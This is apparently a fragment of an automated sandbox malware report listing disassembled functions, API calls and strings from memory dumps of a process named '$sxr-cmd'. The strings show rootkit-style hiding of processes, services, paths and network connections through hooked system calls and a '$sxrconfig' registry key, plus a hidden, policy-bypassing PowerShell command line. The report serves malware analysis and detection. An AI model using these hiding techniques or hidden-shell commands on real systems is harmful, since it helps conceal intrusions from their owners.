                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationQueryToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4239771691-0
                                                                                                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                      • Instruction ID: 6d9d55d385ba8cf06cd894e3d358ce1ff3d26caa8ee00afaae246fc558db720d
                                                                                                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                      • Instruction Fuzzy Hash: 72F015B7B04B81CBD7008F64E58889CBB78F748B98BA5853ACB2843714DB75D9A4CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                      • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                      • API String ID: 106492572-3028563969
                                                                                                                      • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction ID: 25b7d039d37bed566bae75abd468513bfa9860455df18688c444a9bd6b9b0189
                                                                                                                      • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                                      • Instruction Fuzzy Hash: 5C711A2671AF5085EB10DFA5E89869D37B6F785FA8F801121DE4D5BB6AEF3AC444C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6154FF52A,00000000,00000000,?,00000000,?,00007FF6154FE626,?,?,00000000,00007FF615501F69), ref: 00007FF6154FF8DE
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF8FB
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF951
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FF96B
                                                                                                                      • wcschr.MSVCRT ref: 00007FF6154FFA8E
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154FFB14
                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FFB2D
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF6154FFBEA
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154FF996
                                                                                                                        • Part of subcall function 00007FF615500010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF61551849D,?,?,?,00007FF61551F0C7), ref: 00007FF615500045
                                                                                                                        • Part of subcall function 00007FF615500010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61551F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF615500071
                                                                                                                        • Part of subcall function 00007FF615500010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500092
                                                                                                                        • Part of subcall function 00007FF615500010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155000A7
                                                                                                                        • Part of subcall function 00007FF615500010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615500181
                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D401
                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D41B
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D435
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550D480
                                                                                                                      Strings
                                                                                                                      • =,;, xrefs: 00007FF6154FF8C8
                                                                                                                      • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF6154FF90E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                      • String ID: =,;$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
                                                                                                                      • API String ID: 3964947564-2248143620
                                                                                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                      • Instruction ID: dd92ae7826c1c892f478b2f31df198d0fe9034b7eeec5d8cae8725a53a110cc7
                                                                                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                      • Instruction Fuzzy Hash: 6C029B2AA09E42D6EA549B28A8441B9F7A1FF44F78F554136D91EC66F1EF3CAC10C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp$iswspacewcschr
                                                                                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                      • API String ID: 840959033-3627297882
                                                                                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                      • Instruction ID: 3b098cfaf30b274e01e21304ed27adb7baa44c31c6d438dfd9addec5ebf24e93
                                                                                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                      • Instruction Fuzzy Hash: 3FD15B39E08E43C6FB509F25A8452B9ABA0BF54F68F945036D90EC62B5EF3CEC558710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                      • API String ID: 198002717-267741548
                                                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                      • Instruction ID: a6802bdb260c72392a950daa971ed4db5789221b30bc02e2994bfd9dc833cd88
                                                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                      • Instruction Fuzzy Hash: 3851FD39A08E43C6EA149F25A810279EB60FF59FA5F85A436D90EC3675DF2CE9448740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigitiswspacewcschr
                                                                                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                      • API String ID: 1595556998-2755026540
                                                                                                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                      • Instruction ID: 5a7a24a106ce09d4d40cd98adac353e6175cb30843459e6879d33fa2e65f6e41
                                                                                                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                      • Instruction Fuzzy Hash: 06227E69D08E56A6FA648B2DA440279E6A0BF04FB4F415133D95DC22F4EF3CEC61DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                      • String ID: "$=,;
                                                                                                                      • API String ID: 3545743878-4143597401
                                                                                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                      • Instruction ID: 64a34d12556e3c734215cda40c15c56a52d3dffad125bc86f3187ca62770e5ca
                                                                                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                      • Instruction Fuzzy Hash: FBC18D65A09E92C2FB655B19D000379F6E0FF49F64F499036CAAE877A4EF3CAC558700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                                      • API String ID: 1741086925-759476645
                                                                                                                      • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction ID: 326dc180ffae68a3698c42e2bb486c49780219fc6c08e975c7033b44e4ceec5c
                                                                                                                      • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction Fuzzy Hash: 8041986521BF4AA0FA04DBD4E86D6E82337B744B64FC45423D54D1E1B3BE7B8289D360
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentFormatMessageThread
                                                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                      • API String ID: 2411632146-3173542853
                                                                                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                      • Instruction ID: 511c082119e5fedb2a993a2997cd065124dde93d68b6af1cc767cc8040cd502b
                                                                                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                      • Instruction Fuzzy Hash: F0617E69A09E42C5EA64DF61A4845B5ABA0FF44FA8F480136DA0D87B78DF3CE941CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                      • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction ID: d273b7b33453f497520c7649af28154c3e077199ecb6268de16b7456aa80a0fb
                                                                                                                      • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction Fuzzy Hash: 81515A72609B4493FB14CFA2E54839AB3B2F789FA4F848125DA4D4BB15EF3DC0568744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile_open_osfhandle
                                                                                                                      • String ID: con
                                                                                                                      • API String ID: 2905481843-4257191772
                                                                                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                      • Instruction ID: 82a5cf1588d834431d52ddf4c23b01662e4207ca4d5f36ed2d61eedcf12bb714
                                                                                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                      • Instruction Fuzzy Hash: B3717836608A41CAE7608F24E440679FBA4FB49FB5F544235DA5EC27A5DF3CD849CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3829876242-3916222277
                                                                                                                      • Opcode ID: 001fdc610d61f38e35d8eb850943c57dbc85407de928d369b3e64990ecac9e6a
                                                                                                                      • Instruction ID: 0025b68514c8c5cac08e43c93fa05bfbf9a60519e6f4a277ed00fffb906e174d
                                                                                                                      • Opcode Fuzzy Hash: 001fdc610d61f38e35d8eb850943c57dbc85407de928d369b3e64990ecac9e6a
                                                                                                                      • Instruction Fuzzy Hash: E4615D2AA08A4286EA149F11945417EFBB1FFC9FA4F468135DE0E877A5DF3CED058B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                                                      • API String ID: 3510147486-2605508654
                                                                                                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                      • Instruction ID: 0bcf1587271e0b5ce62656cad237ee7fbf5ee5365911317c6a1c377ee08d45d1
                                                                                                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                      • Instruction Fuzzy Hash: 2161293A608BC2CAEB658F21D8443EAB7A4FB45F95F444135DA0D8B768DF78DA45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF6154F7279,?,?,?,?,?,00007FF6154FBFA9), ref: 00007FF615514485
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: longjmp
                                                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                      • API String ID: 1832741078-366822981
                                                                                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                      • Instruction ID: 0701d72f038bbee938f658a1b3faebe36b3e592fee8e5d3f94461ee42039c278
                                                                                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                      • Instruction Fuzzy Hash: EDC17E68E0CE42C1E628DF5A55905BDAFA1AB46FA4F916036DD0DD76B1CF3CAC46C340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heapwcschr$AllocateProcessmemset
